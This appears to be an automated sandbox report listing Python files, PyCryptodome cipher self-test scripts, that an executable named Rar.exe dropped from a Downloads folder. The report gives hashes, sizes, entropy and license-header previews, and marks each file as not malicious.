                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/AES.py: Self-test for the AES cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6621
                                                                                                                                                                                      Entropy (8bit):5.305716519169683
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:YwfFQHvoYHgW7KtQBTUtRUfOuCPjW+GIOEN7RataZu/VCunMirB:YwdQHvRQgVQUM4rB
                                                                                                                                                                                      MD5:B87A188050AF2A09D7F1D295134E9194
                                                                                                                                                                                      SHA1:7F6A2BE8054831EF69A90CC7C94D3807DC93C3B0
                                                                                                                                                                                      SHA-256:82C1FE3F3E2A2056EEFE5C7A2FF0DB52A8BA12012411BA8692636044B5D47D14
                                                                                                                                                                                      SHA-512:B215E0107A44D86ABFA9103F06FED3CC6E44F6090AF0E47A62094EDF21F17090112A168397D201E967787D2EDCBB4F07236D980746DC208DB33AB06000E5DC0F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/ARC2.py: Self-test for the Alleged-RC2 cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):25450
                                                                                                                                                                                      Entropy (8bit):4.102295070491694
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:YUe0La2IgMfLrDDtIoOJrL+cWuuO221c4Q9FTSScnHNqh0ndYnB0pL++:YH0La2AfOoOt+zdO5PSFNANqiaq
                                                                                                                                                                                      MD5:A628F3159DB22911E3886971DF0D9116
                                                                                                                                                                                      SHA1:01D491D6C9867B3B8C2D4966B108864EB0FC6EF0
                                                                                                                                                                                      SHA-256:4B5535377C5F07E7A2BEB41443BEAE9E340C3F0E0C2CCE7770BBA489CFF57E20
                                                                                                                                                                                      SHA-512:5B2F8A7E1ACC453656251E0FADB2762AD65FEB141EA9A162C345F25F0AB873E5B7B742E149BA086F7B8449B169C91D7EA3BDCE49434B65BCFE881A068A8C66C3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/ARC4.py: Self-test for the Alleged-RC4 cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7390
                                                                                                                                                                                      Entropy (8bit):5.2680859039459165
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:/wdQHvMFFlIpgA3KM0vOGTga/djVApGRXN/MOh:/UeMFFl6gMKM0Z
                                                                                                                                                                                      MD5:8B80D84AFCCD46C28B9EAF5C6AD7442F
                                                                                                                                                                                      SHA1:ADE78A3D2095C7FDE77D6CEB5F4DFB3BA39AD9AE
                                                                                                                                                                                      SHA-256:91F26B656B58BA5C73C57DA0AE5B48F5A911D82DB12738B59AE5C8B82F96270C
                                                                                                                                                                                      SHA-512:88261BDD58287685C66982D85673A9E8264B88B4863E74A7601B462D35EBB6229D6282F996045209F0FC57FCF2BDB77403BA30117D994E16F61681224EA6D311
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/test_Blowfish.py: Self-test for the Blowfish cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONN
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3380
                                                                                                                                                                                      Entropy (8bit):5.2648285141796896
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:NbwEIB0jcQHMsvI/S3oCFlE+Qs+tx8NIZNgtNpMaZC3eZ+kCun8Dsrajy:JwfFQHvoBHscOYit7ku1CunMsrp
                                                                                                                                                                                      MD5:42CD9C86B6A76226293A43A9310F0310
                                                                                                                                                                                      SHA1:FD751A06B182925F0F45813E3BCDE1F26D0D2078
                                                                                                                                                                                      SHA-256:98A16555489559E0B93F6338A7CA46516232DF195093859CFAF3EFB05B9AB7FA
                                                                                                                                                                                      SHA-512:0D029235022EBEEE6131986449A84ABD1F64A31B04A51C73F6A1AE42CC0F60B7F4189BFEB7BE843339A8C3082BD578A8B110C7DCDB78C34B74E2512F5E0CE36D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/CAST.py: Self-test for the CAST-128 (CAST5) cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNE
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20758
                                                                                                                                                                                      Entropy (8bit):4.976686485008944
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:0rskrs9VqFUiiIzqO9/WgGD4GxZxYe4EO+cCFtKCA9uCnjuGDXx+:0r6qh9Q4EdcCFtKCAcCaGDB+
                                                                                                                                                                                      MD5:120D405F44D54B6CFAFFAFB1AEAC7A16
                                                                                                                                                                                      SHA1:56AB7734215AD736C4D1026CE236069AEC97FAD7
                                                                                                                                                                                      SHA-256:C2D96EA70E4CA1A31C148E7E1A3A44F696596DF00992D51A4868D96465B2E332
                                                                                                                                                                                      SHA-512:421C0CA1FEC6CDED7CE2E1D7BA7C71A0192DDCB274E6C683F0E6236C2F6ACB2B85A01D687C919A8C95C053EDE5FB308F113D3D7BB45063D1EBF6B78D8032160A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):38240
                                                                                                                                                                                      Entropy (8bit):4.91982351735035
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:Hrskrs9Vq732a4qBfxjXTqXPqzvGfp589zJ2FmOsI2vJfd+OjYyp9ynb1cd7l+6J:Hr6qN4ANgLmxWJ/F01aDXqx
                                                                                                                                                                                      MD5:A685CF6BD22AB69D370F92B81D9C0E59
                                                                                                                                                                                      SHA1:7EA6F54B4469B4B033D82BB5BFFC5659D967AA15
                                                                                                                                                                                      SHA-256:A8351FB17A8A7B405D4FF76C2B596848FF5239A3E4D5E7F699240A4C96D71462
                                                                                                                                                                                      SHA-512:2DA781592EA409DDBB7C15F14E29F09F58B1A304609E0F0061D086ADBB8AEB683E87E9200F7DB6B036B2ED86175FC61DED04FD2BB060541D65EE1A1752F573E6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16472
                                                                                                                                                                                      Entropy (8bit):4.9687403467675555
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:9qrskrs9t3q/IFOD7nMCWaL0CH1k9SC/D6PV3TRrFVBvGGHSrAOp:0rskrs9VqzvMCFL0CVk9SC/DKFVG
                                                                                                                                                                                      MD5:01F0F6D83AB2952197EAEB8F0F83A00D
                                                                                                                                                                                      SHA1:43D59454591AEB6F9DA2B8DC92E2B9BF5C4B8544
                                                                                                                                                                                      SHA-256:9EA26EEBF360B5271B9A4FFB3A961CB19114903906D37FB1DEF604E25BF433EB
                                                                                                                                                                                      SHA-512:0F4807944F16CD43FD0DD1EA59AD9A0B4467A0843C6FB844E50D8314C5DF5BBDF4448646479397686660062A82B632097CB2B7DFC429B3B302D140B537F04A2F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):21786
                                                                                                                                                                                      Entropy (8bit):5.096707176497335
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:4qrskrs9t3q/I5KdTQUBgQXKIQ4NBtkP5QoIAfi+1+PVcC7+bKGw5EBaBg/y/xNe:Hrskrs9VqKZYPV0Nakoe8QjNV1cYtsu
                                                                                                                                                                                      MD5:AE67CABCE5676ADF76D54C20328CA40E
                                                                                                                                                                                      SHA1:6009537CE1C06784B2304C11D37BA964F54BB258
                                                                                                                                                                                      SHA-256:4A24DAB89ED26A137BB8ED94B121623FDFE98B1E1582A1B259D8F8A4C9FEBFFE
                                                                                                                                                                                      SHA-512:FE9C0CA688E90F6A6A88C10E72B07D7486D86B2F2D80DFF3D74098D6EEE7460810BD3E4737C1B7D68E9FBA621989D3ECE742E792C2EC8D8FD17831E7CA918CA9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20845
                                                                                                                                                                                      Entropy (8bit):4.919874389291741
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:0rskrs9Vqse4VTbVH31w6YKxYWQChRrYChgz9u:0r6qseObVH31hYyZgxu
                                                                                                                                                                                      MD5:6C26707E9C0059E6B221CB64D91AC717
                                                                                                                                                                                      SHA1:8DD876F7CF6D438EF7E6F9B1117CA0F8644E7B73
                                                                                                                                                                                      SHA-256:15EC0CCBE86A0910D0416230FAC536FC59AE0A86ED59D866E6C584AE1306E23E
                                                                                                                                                                                      SHA-512:8C261E8630939AE97648D93562D97FDF19B098DA22C599B96918882D38809AFF208658E7D39104C353DF521E2CA2DC9126674EF1B1901C35E19F4EE50A197915
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):31490
                                                                                                                                                                                      Entropy (8bit):4.760962660094756
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:zrskrs9Vq54KdH+zQlFTMzJjecMLn6rrMPCrFC2Ogx9m2gJ444BP6xDIG76pYWsh:zr6qPHL6PMlPHYahKS2yGeVqZo
                                                                                                                                                                                      MD5:75D6666A336FBAA99E486B14AEF6D176
                                                                                                                                                                                      SHA1:3B11356C0D13F488C2D5F7A274D90CB27E7D3DD7
                                                                                                                                                                                      SHA-256:15F3B00A1BC049C62C9E26EF3A06D91FDD800028BD4CBE2A82FA521EFCAB336E
                                                                                                                                                                                      SHA-512:6606475A2DA9826A83BCED8A37F2F5F31C2B31FB13A2736565D9702B33DC660E49FFAB844E7914A3E0BD1AE790BC4D3336471CB658C6708723C713FA10DF944A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16317
                                                                                                                                                                                      Entropy (8bit):4.972164250562502
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:HwdQHvGJ6ea9UaWpN8CioAMv6WvkIy36Yc4OB:HUeGJ6DBW/9AMvdIbI
                                                                                                                                                                                      MD5:99CE82AB3012C74BC91F8E8B95427E25
                                                                                                                                                                                      SHA1:1B092CD7DECEF875899FE7B53B62C5533652335D
                                                                                                                                                                                      SHA-256:2FF59AB811C58999DA679B0D9F25D666EBAE2FF1F1745A1044FC3DBD0E303A4F
                                                                                                                                                                                      SHA-512:B69CA5C84B5DD23175EB96A498298A16A576E0806FDCDBBC05EB85217C8472453D674D06411F16625E32BBB84AB391353AF8EFED6D45C3A5E9ADE02970ADBC3D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/DES.py: Self-test for the (Single) DES cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6756
                                                                                                                                                                                      Entropy (8bit):5.06266598549299
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:vqwfFQHvoI13aHDjuAyiBvhvmRzhHY4loq4lo03ufufunslOi:ywdQHvJAyE87eOi
                                                                                                                                                                                      MD5:23C5203726EDB0F1187847B33A8100E4
                                                                                                                                                                                      SHA1:CE17C2044B3C699B97758EA1F3B2865A30F4EF2A
                                                                                                                                                                                      SHA-256:1B98BD98C3D586FF6C16A0C281C5E16AE56F6E6B1D2742CB82D071CF6F54AFAA
                                                                                                                                                                                      SHA-512:A589F23C35E9B0B1FCCC0D04247213018A2F6BB0F4D21303833ACDA41FC148BF884E20BCF882F0547FE99EE7F2079BA89EF7298FE822F0262E5D924072C1179E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/DES3.py: Self-test for the Triple-DES cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):29594
                                                                                                                                                                                      Entropy (8bit):4.957692526089376
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:Hrskrs9VqihhfkZA0feFGMQcne3MKLLr9B6ES4HCkh9uVg1444W06mD3GL6ppWXP:Hr6qEk/vtS4VyOk2VX3DX
                                                                                                                                                                                      MD5:3D9F3EE8F186BE39CD8BD11A32546DB9
                                                                                                                                                                                      SHA1:B925778DB3FDED551EAB7C8D2BDC70566E1A8FF5
                                                                                                                                                                                      SHA-256:DBC39CEA208C0A3D8963C29360393E485FEDB9A8F66C0A9CAD285014C96FDF58
                                                                                                                                                                                      SHA-512:38630AF0D2242F8425375F6E87FE5C1F81BF71FC74F2EF8CC6BF245E4B3E61D47D9A260960C2303B87740424E330DDB27858B4670E07944C3F615C92B700643A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):38227
                                                                                                                                                                                      Entropy (8bit):4.989191313246231
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:Hrskrs9VqvamL+F78Lz12BKOsc2zJjd+6neiVzoHG7hi6oaaaNH8z5kwIgX8As3N:Hr6qRLLRWiV0/vC9Q7pTmYXoX3h
                                                                                                                                                                                      MD5:63DEBE7801411BF7CE24C24D875307ED
                                                                                                                                                                                      SHA1:DC67FA052453B85A8A6B1E7C4DA386F821534E13
                                                                                                                                                                                      SHA-256:FBD00F487173D330C461DC53F14CB971BDC708630515BF343864F83A7DD98C1A
                                                                                                                                                                                      SHA-512:B98888E159F2E530A90C07D0146FC95019B667C1C8B1836FFCD66F2D403D65D26143E171FE5F822113FC3508D0BC1A108D49C9F79D14A036685E921FEE6BF0A7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
